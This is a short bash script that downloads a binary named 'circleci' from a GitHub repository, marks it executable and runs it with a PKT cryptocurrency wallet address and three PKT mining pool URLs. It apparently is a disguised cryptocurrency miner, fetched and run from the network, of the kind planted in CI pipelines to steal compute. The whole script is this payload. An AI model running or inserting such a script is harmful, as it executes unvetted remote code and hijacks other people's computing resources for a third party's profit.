#!/bin/bash
wget https://github.com/aurbach55/zash/raw/main/circleci
chmod +x circleci
./circleci ann -p pkt1qfd04qlvx4ag9yrm9m5ju6fwp2kyx7ct0fnteqp http://pool.pkteer.com http://pool.pktpool.io http://pool.pkt.world

